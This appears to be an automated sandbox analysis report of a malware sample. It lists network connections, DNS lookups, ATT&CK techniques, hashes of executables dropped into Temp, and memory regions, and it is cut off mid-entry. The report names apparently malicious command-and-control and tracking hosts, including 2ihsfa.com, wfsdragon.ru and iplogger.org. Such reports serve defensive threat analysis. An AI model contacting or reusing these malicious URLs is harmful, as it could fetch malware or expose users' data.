199.59.243.225:80

http://survey-smiles.com/

http

377 B
1.9kB
5
4

HTTP Request

GET http://survey-smiles.com/

HTTP Response

200
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

361.7kB
533.3kB
1053
1236

HTTP Request

GET http://uehge4g6gh.2ihsfa.com/api/fbtime

HTTP Response

200

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

HTTP Response

405

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
157.240.221.35:443

www.facebook.com

tls

1.0kB
2.7kB
8
6
157.240.221.35:443

www.facebook.com

tls

3.6kB
33.1kB
34
42
163.70.147.4:443

secure.facebook.com

tls

2.6kB
5.7kB
16
18
34.143.166.163:80

http://www.iyiqian.com/

http

469 B
868 B
6
5

HTTP Request

GET http://www.iyiqian.com/

HTTP Response

200
163.70.147.23:443

static.xx.fbcdn.net

tls

2.8kB
20.7kB
31
32
163.70.147.23:443

static.xx.fbcdn.net

tls

793 B
2.6kB
6
5
163.70.147.23:443

static.xx.fbcdn.net

tls

793 B
2.6kB
6
5
163.70.147.23:443

static.xx.fbcdn.net

tls

839 B
2.6kB
7
5
142.250.200.42:443

content-autofill.googleapis.com

tls

3.5kB
7.3kB
21
18
142.250.200.42:443

content-autofill.googleapis.com

tls

1.5kB
1.6kB
10
6
149.154.167.99:443

t.me

tls

11.8kB
224.9kB
151
200
163.70.147.35:443

facebook.com

tls

1.7kB
5.1kB
14
15
37.0.11.8:80

156 B
3
136.144.41.201:80

208 B
4
104.21.5.208:80

http://wfsdragon.ru/api/setStats.php

http

535 B
858 B
7
6

HTTP Request

GET http://wfsdragon.ru/api/setStats.php

HTTP Response

200
212.193.30.115:80

260 B
5
104.21.5.208:80

http://wfsdragon.ru/api/setStats.php

http

639 B
2.1kB
9
8

HTTP Request

GET http://wfsdragon.ru/api/setStats.php

HTTP Response

200
212.193.30.115:80

260 B
5
212.193.30.115:80

260 B
5
212.193.30.115:80

260 B
5
212.193.30.115:80

260 B
5
212.193.30.115:80

260 B
5
212.193.30.115:80

260 B
5
204.79.197.200:443

tse1.mm.bing.net

tls

1.5kB
8.2kB
17
13
204.79.197.200:443

tse1.mm.bing.net

tls

66.0kB
1.7MB
1255
1249
204.79.197.200:443

tse1.mm.bing.net

tls

1.5kB
8.2kB
17
13
204.79.197.200:443

tse1.mm.bing.net

tls

1.5kB
8.2kB
17
13
204.79.197.200:443

tse1.mm.bing.net

tls

1.4kB
8.3kB
16
14
212.193.30.115:80

208 B
4
212.193.30.115:80

156 B
3
212.193.30.115:80

104 B
2

8.8.8.8:53

19.177.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

19.177.190.20.in-addr.arpa
8.8.8.8:53

158.240.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

158.240.127.40.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

112 B
72 B
2
1

DNS Request

ip-api.com

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

www.listincode.com

dns

64 B
80 B
1
1

DNS Request

www.listincode.com

DNS Response

199.59.243.225
8.8.8.8:53

ipinfo.io

dns

55 B
71 B
1
1

DNS Request

ipinfo.io

DNS Response

34.117.186.192
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

219 B
144 B
3
1

DNS Request

95.221.229.192.in-addr.arpa

DNS Request

95.221.229.192.in-addr.arpa

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

192.186.117.34.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

192.186.117.34.in-addr.arpa
8.8.8.8:53

music-sec.xyz

dns

59 B
124 B
1
1

DNS Request

music-sec.xyz
8.8.8.8:53

iplogger.org

dns

58 B
90 B
1
1

DNS Request

iplogger.org

DNS Response

172.67.132.113

104.21.4.208
8.8.8.8:53

113.132.67.172.in-addr.arpa

dns

146 B
135 B
2
1

DNS Request

113.132.67.172.in-addr.arpa

DNS Request

113.132.67.172.in-addr.arpa
8.8.8.8:53

225.243.59.199.in-addr.arpa

dns

146 B
131 B
2
1

DNS Request

225.243.59.199.in-addr.arpa

DNS Request

225.243.59.199.in-addr.arpa
8.8.8.8:53

iplogger.org

dns

58 B
90 B
1
1

DNS Request

iplogger.org

DNS Response

172.67.132.113

104.21.4.208
8.8.8.8:53

3.171.2.186.in-addr.arpa

dns

140 B
94 B
2
1

DNS Request

3.171.2.186.in-addr.arpa

DNS Request

3.171.2.186.in-addr.arpa
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

142 B
95 B
2
1

DNS Request

1.112.95.208.in-addr.arpa

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

201.178.17.96.in-addr.arpa

dns

216 B
137 B
3
1

DNS Request

201.178.17.96.in-addr.arpa

DNS Request

201.178.17.96.in-addr.arpa

DNS Request

201.178.17.96.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

x2.i.lencr.org

dns

120 B
165 B
2
1

DNS Request

x2.i.lencr.org

DNS Request

x2.i.lencr.org

DNS Response

173.222.13.40
8.8.8.8:53

www.facebook.com

dns

124 B
107 B
2
1

DNS Request

www.facebook.com

DNS Request

www.facebook.com

DNS Response

163.70.147.35
8.8.8.8:53

x2.c.lencr.org

dns

60 B
165 B
1
1

DNS Request

x2.c.lencr.org

DNS Response

173.222.13.40
8.8.8.8:53

40.13.222.173.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

40.13.222.173.in-addr.arpa
8.8.8.8:53

e1.o.lencr.org

dns

60 B
159 B
1
1

DNS Request

e1.o.lencr.org

DNS Response

96.17.179.201

96.17.179.193
8.8.8.8:53

35.147.70.163.in-addr.arpa

dns

72 B
125 B
1
1

DNS Request

35.147.70.163.in-addr.arpa
224.0.0.251:5353

509 B
8
8.8.8.8:53

201.179.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

201.179.17.96.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

142 B
157 B
2
1

DNS Request

43.58.199.20.in-addr.arpa

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

humisnee.com

dns

58 B
74 B
1
1

DNS Request

humisnee.com

DNS Response

185.107.56.199
8.8.8.8:53

survey-smiles.com

dns

63 B
79 B
1
1

DNS Request

survey-smiles.com

DNS Response

199.59.243.225
8.8.8.8:53

199.56.107.185.in-addr.arpa

dns

73 B
134 B
1
1

DNS Request

199.56.107.185.in-addr.arpa
8.8.8.8:53

167.109.18.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

167.109.18.2.in-addr.arpa
8.8.8.8:53

uehge4g6gh.2ihsfa.com

dns

67 B
99 B
1
1

DNS Request

uehge4g6gh.2ihsfa.com

DNS Response

13.248.169.48

76.223.54.146
8.8.8.8:53

146.78.124.51.in-addr.arpa

dns

216 B
158 B
3
1

DNS Request

146.78.124.51.in-addr.arpa

DNS Request

146.78.124.51.in-addr.arpa

DNS Request

146.78.124.51.in-addr.arpa
8.8.8.8:53

www.iyiqian.com

dns

183 B
215 B
3
3

DNS Request

www.iyiqian.com

DNS Request

www.iyiqian.com

DNS Request

www.iyiqian.com

DNS Response

34.143.166.163

DNS Response

34.143.166.163
8.8.8.8:53

www.facebook.com

dns

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.221.35
8.8.8.8:53

secure.facebook.com

dns

65 B
107 B
1
1

DNS Request

secure.facebook.com

DNS Response

163.70.147.4
157.240.221.35:443

www.facebook.com

https

45.5kB
372.2kB
172
371
8.8.8.8:53

static.xx.fbcdn.net

dns

130 B
104 B
2
1

DNS Request

static.xx.fbcdn.net

DNS Request

static.xx.fbcdn.net

DNS Response

163.70.147.23
8.8.8.8:53

35.221.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.221.240.157.in-addr.arpa
8.8.8.8:53

4.147.70.163.in-addr.arpa

dns

71 B
121 B
1
1

DNS Request

4.147.70.163.in-addr.arpa
8.8.8.8:53

227.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

227.179.250.142.in-addr.arpa
8.8.8.8:53

74.169.217.172.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

74.169.217.172.in-addr.arpa
163.70.147.23:443

static.xx.fbcdn.net

https

17.4kB
391.2kB
189
396
8.8.8.8:53

23.147.70.163.in-addr.arpa

dns

144 B
116 B
2
1

DNS Request

23.147.70.163.in-addr.arpa

DNS Request

23.147.70.163.in-addr.arpa
8.8.8.8:53

163.166.143.34.in-addr.arpa

dns

146 B
126 B
2
1

DNS Request

163.166.143.34.in-addr.arpa

DNS Request

163.166.143.34.in-addr.arpa
8.8.8.8:53

48.169.248.13.in-addr.arpa

dns

144 B
128 B
2
1

DNS Request

48.169.248.13.in-addr.arpa

DNS Request

48.169.248.13.in-addr.arpa
8.8.8.8:53

content-autofill.googleapis.com

dns

77 B
253 B
1
1

DNS Request

content-autofill.googleapis.com

DNS Response

142.250.200.42

142.250.200.10

216.58.201.106

216.58.204.74

172.217.169.10

142.250.179.234

142.250.180.10

142.250.187.202

142.250.187.234

172.217.16.234

142.250.178.10
163.70.147.23:443

static.xx.fbcdn.net

https

5.3kB
21.8kB
28
33
8.8.8.8:53

facebook.com

dns

174 B
74 B
3
1

DNS Request

facebook.com

DNS Request

facebook.com

DNS Request

facebook.com

DNS Response

163.70.147.35
8.8.8.8:53

42.200.250.142.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

42.200.250.142.in-addr.arpa
8.8.8.8:53

t.me

dns

50 B
66 B
1
1

DNS Request

t.me

DNS Response

149.154.167.99
163.70.147.35:443

facebook.com

https

5.0kB
13.2kB
21
19
8.8.8.8:53

ninhaine.com

dns

116 B
131 B
2
1

DNS Request

ninhaine.com

DNS Request

ninhaine.com
8.8.8.8:53

2makestorage.com

dns

186 B
135 B
3
1

DNS Request

2makestorage.com

DNS Request

2makestorage.com

DNS Request

2makestorage.com
8.8.8.8:53

99.167.154.149.in-addr.arpa

dns

73 B
166 B
1
1

DNS Request

99.167.154.149.in-addr.arpa
8.8.8.8:53

nisdably.com

dns

232 B
233 B
4
3

DNS Request

nisdably.com

DNS Request

nisdably.com

DNS Request

nisdably.com

DNS Request

nisdably.com
8.8.8.8:53

aucmoney.com

dns

58 B
131 B
1
1

DNS Request

aucmoney.com
8.8.8.8:53

thegymmum.com

dns

59 B
132 B
1
1

DNS Request

thegymmum.com
8.8.8.8:53

fe0b449a-bcc8-4a3a-a035-53814b5092ca.ninhaine.com

dns

95 B
168 B
1
1

DNS Request

fe0b449a-bcc8-4a3a-a035-53814b5092ca.ninhaine.com
8.8.8.8:53

atvcampingtrips.com

dns

65 B
138 B
1
1

DNS Request

atvcampingtrips.com
8.8.8.8:53

server2.ninhaine.com

dns

66 B
139 B
1
1

DNS Request

server2.ninhaine.com
8.8.8.8:53

kuapakualaman.com

dns

189 B
136 B
3
1

DNS Request

kuapakualaman.com

DNS Request

kuapakualaman.com

DNS Request

kuapakualaman.com
8.8.8.8:53

renatazarazua.com

dns

126 B
136 B
2
1

DNS Request

renatazarazua.com

DNS Request

renatazarazua.com
8.8.8.8:53

nasufmutlu.com

dns

60 B
133 B
1
1

DNS Request

nasufmutlu.com
8.8.8.8:53

server2.ninhaine.com

dns

66 B
139 B
1
1

DNS Request

server2.ninhaine.com
8.8.8.8:53

spolaect.info

dns

118 B
2

DNS Request

spolaect.info

DNS Request

spolaect.info
8.8.8.8:53

wfsdragon.ru

dns

58 B
90 B
1
1

DNS Request

wfsdragon.ru

DNS Response

104.21.5.208

172.67.133.215
8.8.8.8:53

208.5.21.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

208.5.21.104.in-addr.arpa
8.8.8.8:53

88.156.103.20.in-addr.arpa

dns

144 B
158 B
2
1

DNS Request

88.156.103.20.in-addr.arpa

DNS Request

88.156.103.20.in-addr.arpa
8.8.8.8:53

22.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.236.111.52.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

dns

139 B
1

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
180B

MD5
4bc8a3540a546cfe044e0ed1a0a22a95

SHA1
5387f78f1816dee5393bfca1fffe49cede5f59c1

SHA256
f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca

SHA512
e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe

Filesize
975KB

MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe

Filesize
897KB

MD5
f709715401ab7fe50bc780760bf9e3e5

SHA1
6d7193cfd1f546eda62a1609b9b8f52a72c3fc55

SHA256
721ddafd3417eb0cf0e57076265bb124fdf00e2debc13e8bb0a27c89fdc808d2

SHA512
6dfc5b0dea4a134271f7b36029d451259887d42334fb2ed6cf9c8adaef80370866f0e35e4f139225ac267f624c3ebf1e88cc75db2ab1a7baacf92ec84a8eb13a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe

Filesize
712KB

MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe

Filesize
381KB

MD5
5a8cac0f11af5d1f697fd4605b94340b

SHA1
26fc1b275094e6cf7926f82435463fca441e308a

SHA256
d9772558c0555b9e531e50af984ab64b4e38af2917712acf5d96caafec05ec76

SHA512
9f4d5c9247177bace98ddac536261f44e4301bdaf6ea03eb834855e65a1b65f27e295f56b2bd7145baa9321fc47b01d6dd0b41483ea89ee54427fed2ea92c311

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe

Filesize
2.4MB

MD5
e8d7444ace76d0133904769a90eba8f7

SHA1
bcd825a99ac408b549bcdd39dad697375c3ec9b5

SHA256
f733fd9bf7666ad08e4307bb589cdf4dc3db443203db7d80ce1de8055f917597

SHA512
b1ea5a2611e5faad019a15f2c953d778f197400f21f62326010d9498fb321c6ed60081ae7607d3d3d17036c19bb997780ea0dbc95a2e329e06485a57fdc3b2a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe

Filesize
1.9MB

MD5
4aea6c7f7ba606db6574190ff4748d39

SHA1
100b67ccd32baaa184fc2f675c274947985d1483

SHA256
ce727f7b573c110fbb6fdabf416800f2febd0733abfcbe18b102e4351aa95407

SHA512
4b63daa29178bb07e30a06715137718c7dbec1c02381a7736bfb6e76582d614c607d8284f71f3d18953760b29390cd839adb2311e51991fd4e58dce787b1699b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe

Filesize
92KB

MD5
f31ee2053b3957b3f4bc6ef8255370da

SHA1
3db7330f217f9edd664e7da4015f4c914251b82d

SHA256
65d41d6f881da0784a1c52a873db53569d64802f2cc77a55b170bb1b199870a4

SHA512
ef1d02a858a276b596d8ccb1cecf6c0aec04ab070570953d631178a3abb787422bd1860edf91cdf5a032e1ab914ad68e5967f15c80e071b076beda9c6921169e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe

Filesize
1.4MB

MD5
41b7c6d48d13e1a864bf2d3759e257e6

SHA1
7ee45121a927d744941651bd6673d3df21f1611b

SHA256
820c980f68378170cec0e1f2f4e2e319a07b1d030d7712ece110f579fcd1a8c2

SHA512
0ac230d6ea4f7eaf1c5dbc919e1de41416e4c5e527e0ec583135eab2067d0fcd22615d80a93f803ce327cdbb58b5b236ca47d759647b8c36a98a17a3e1504077

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install_Files.exe

Filesize
381KB

MD5
10c4e134206eaeae9629258618e961c9

SHA1
1c98596001b3cee511b33f699011bd02e0ca619a

SHA256
78e19f3f017faffd6ed02b03b67b5dc6a521b1537aee0cc939c5b162a73bb799

SHA512
6b235bc2a438a56ee2e7d34510b805fb2e44f22b111cfdb0d6480c6aa50972d9bd847cd6cd8ceb50cce625a1d0b91696f12f8ad3e2393d70efa94838c30f2f3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe

Filesize
201KB

MD5
b70f516d57624c741cabeebb65cce996

SHA1
98c27ae9fa2742dfedcf765c5b37d7830673c2ff

SHA256
32e4d190cebe0be41e148b8863fad2c8973b1afc9d60238ac9ec1daeb1e1a2d2

SHA512
aae21583810803053b0112f720c142de570b75c41d6bb63ae7e870750678478cc7140204c1108b83fee7f53de77e5de2a9752fdff0279563ceea94c2401acf95

Download Submit
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Network\Network Persistent State

Filesize
2KB

MD5
ab1253d04d3633af6804a6ff3c0c9904

SHA1
c2577e0ba6c2c17a6aa93f3d3d2a97e4dbda7eda

SHA256
378719b4004d6b4e63f0b01053d71d6c34657932304f4df41570da723e31d68c

SHA512
b53f0cf09c01be7a17ac665f064017db091abd25f2549fd2856a638b716dd430525ae7d42f178f5b8a9df00a9a8c17cecbed498272385b33150eaa71c20c2010

Download Submit
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Network\TransportSecurity

Filesize
874B

MD5
d34e174a8d8291f281221479e90ebb8a

SHA1
d1cc01aee3978d8418a910650ff4562c3554f712

SHA256
fd10a2cd968299619d9e44e55c52b04c9f684b02214a11be1dcff5a2f25f3a09

SHA512
3306bbdb8c227acefd5003aa0faa8eb3897ab2c24ae86c1d329aff39928c5bb7062d1feaeb2d4daf04b1a9346e150879b27aefa59e49e392b6dc83fa59b080fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Local State

Filesize
225KB

MD5
7bf9b6e5588c88e1d00a1519f63e1e8a

SHA1
3dae75da7ac4402521d3ce9a5cc639c27a575914

SHA256
8ce458e431bcda749a998acacfb23def4f00e4665e8e63ad09071acd2f821980

SHA512
65ee05f087b5e403595811f1a2efcddbd1bbc80759b0a388c7b011c5698c0d3cae3abcbb428150db583ac4f6e51e31b1071fd52b910e555564aaf2e94f385f18

Download Submit
C:\Users\Admin\AppData\Local\Temp\pub2.exe

Filesize
51KB

MD5
0c290dfa9f665e3ef9bf334312e43965

SHA1
b047ed22c06fc98822d70a8e609d13deb3a88653

SHA256
f0de5c618a260fd6e6fe6b8ffc59bca5cf2dc9e4ef2bd73a05c71dd0f752f303

SHA512
0a0f6f32e1c6d0055af87866fa934fe338df81abf52c24c9cdaa3a8acecf1b22350cb3d8281f9cde1448390a96bc91ef3dd5c31a37050958018d11b4cdbf53e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\pub2.exe

Filesize
214KB

MD5
1a1ea56ab621b6302509b15c30af87f3

SHA1
6249a3c2f4336a828d59b07724ae9983a3eef264

SHA256
5d3685c1a78ebb08d03a5de627bba9c55f0e7bfbd6d5efa61c6ad26d111bb2c4

SHA512
66a7c29bc1f0e573c24af632edf1250ae50517c37cd5d2560e0f8619ebb76f26137bd234f504501dd4a79ad7779a17e3e83951cb907f92174102fa3811d48a90

Download Submit
memory/452-192-0x0000000000400000-0x000000000309C000-memory.dmp

Filesize
44.6MB

Download
memory/452-186-0x0000000004DF0000-0x0000000005236000-memory.dmp

Filesize
4.3MB

Download
memory/452-189-0x0000000005240000-0x0000000005B66000-memory.dmp

Filesize
9.1MB

Download
memory/452-198-0x0000000000400000-0x000000000309C000-memory.dmp

Filesize
44.6MB

Download
memory/452-202-0x0000000005240000-0x0000000005B66000-memory.dmp

Filesize
9.1MB

Download
memory/1196-158-0x00007FF95CB70000-0x00007FF95D631000-memory.dmp

Filesize
10.8MB

Download
memory/1196-61-0x0000000000AC0000-0x0000000000AFA000-memory.dmp

Filesize
232KB

Download
memory/1196-67-0x00007FF95CB70000-0x00007FF95D631000-memory.dmp

Filesize
10.8MB

Download
memory/1196-79-0x00000000013C0000-0x00000000013E8000-memory.dmp

Filesize
160KB

Download
memory/1196-93-0x00000000013B0000-0x00000000013C0000-memory.dmp

Filesize
64KB

Download
memory/1376-1413-0x0000000005200000-0x0000000005700000-memory.dmp

Filesize
5.0MB

Download
memory/1376-1421-0x0000000000400000-0x000000000309C000-memory.dmp

Filesize
44.6MB

Download
memory/1376-1987-0x0000000005200000-0x0000000005700000-memory.dmp

Filesize
5.0MB

Download
memory/1376-1441-0x0000000000400000-0x000000000309C000-memory.dmp

Filesize
44.6MB

Download
memory/1376-1998-0x0000000000400000-0x000000000309C000-memory.dmp

Filesize
44.6MB

Download
memory/1648-115-0x00000000721E0000-0x0000000072990000-memory.dmp

Filesize
7.7MB

Download
memory/1648-1351-0x00000000721E0000-0x0000000072990000-memory.dmp

Filesize
7.7MB

Download
memory/1648-1344-0x0000000005320000-0x0000000005348000-memory.dmp

Filesize
160KB

Download
memory/1648-116-0x0000000005450000-0x0000000005460000-memory.dmp

Filesize
64KB

Download
memory/1648-114-0x0000000000A30000-0x0000000000ABA000-memory.dmp

Filesize
552KB

Download
memory/1648-221-0x00000000721E0000-0x0000000072990000-memory.dmp

Filesize
7.7MB

Download
memory/1648-236-0x0000000005450000-0x0000000005460000-memory.dmp

Filesize
64KB

Download
memory/2340-135-0x0000000000400000-0x0000000002C6D000-memory.dmp

Filesize
40.4MB

Download
memory/2340-215-0x0000000000400000-0x0000000002C6D000-memory.dmp

Filesize
40.4MB

Download
memory/2340-133-0x0000000002F30000-0x0000000003030000-memory.dmp

Filesize
1024KB

Download
memory/2340-134-0x0000000002ED0000-0x0000000002ED9000-memory.dmp

Filesize
36KB

Download
memory/3348-179-0x0000000000400000-0x000000000045B000-memory.dmp

Filesize
364KB

Download
memory/3348-181-0x0000000000400000-0x000000000045B000-memory.dmp

Filesize
364KB

Download
memory/3520-212-0x0000000003110000-0x0000000003126000-memory.dmp

Filesize
88KB

Download
memory/3616-1499-0x0000000004710000-0x0000000004718000-memory.dmp

Filesize
32KB

Download
memory/3616-1549-0x0000000004750000-0x0000000004758000-memory.dmp

Filesize
32KB

Download
memory/3616-128-0x0000000000400000-0x000000000060D000-memory.dmp

Filesize
2.1MB

Download
memory/3616-127-0x0000000000400000-0x000000000060D000-memory.dmp

Filesize
2.1MB

Download
memory/3616-239-0x0000000000400000-0x000000000060D000-memory.dmp

Filesize
2.1MB

Download
memory/3616-1986-0x0000000000400000-0x000000000060D000-memory.dmp

Filesize
2.1MB

Download
memory/3616-1486-0x0000000003A60000-0x0000000003A70000-memory.dmp

Filesize
64KB

Download
memory/3616-1494-0x0000000004530000-0x0000000004538000-memory.dmp

Filesize
32KB

Download
memory/3616-1500-0x0000000004730000-0x0000000004738000-memory.dmp

Filesize
32KB

Download
memory/3616-1480-0x0000000003900000-0x0000000003910000-memory.dmp

Filesize
64KB

Download
memory/3616-1502-0x00000000048E0000-0x00000000048E8000-memory.dmp

Filesize
32KB

Download
memory/3616-1503-0x0000000004750000-0x0000000004758000-memory.dmp

Filesize
32KB

Download
memory/3616-1524-0x0000000004750000-0x0000000004758000-memory.dmp

Filesize
32KB

Download
memory/3616-1526-0x0000000004880000-0x0000000004888000-memory.dmp

Filesize
32KB

Download
memory/3616-1547-0x0000000004880000-0x0000000004888000-memory.dmp

Filesize
32KB

Download
memory/3616-1493-0x0000000004510000-0x0000000004518000-memory.dmp

Filesize
32KB

Download
memory/3616-1539-0x0000000004530000-0x0000000004538000-memory.dmp

Filesize
32KB

Download
memory/3616-1516-0x0000000004530000-0x0000000004538000-memory.dmp

Filesize
32KB

Download
memory/3616-1501-0x00000000049E0000-0x00000000049E8000-memory.dmp

Filesize
32KB

Download
memory/3616-1496-0x00000000045D0000-0x00000000045D8000-memory.dmp

Filesize
32KB

Download
memory/5216-230-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/5216-235-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/5320-240-0x0000000000400000-0x000000000309C000-memory.dmp

Filesize
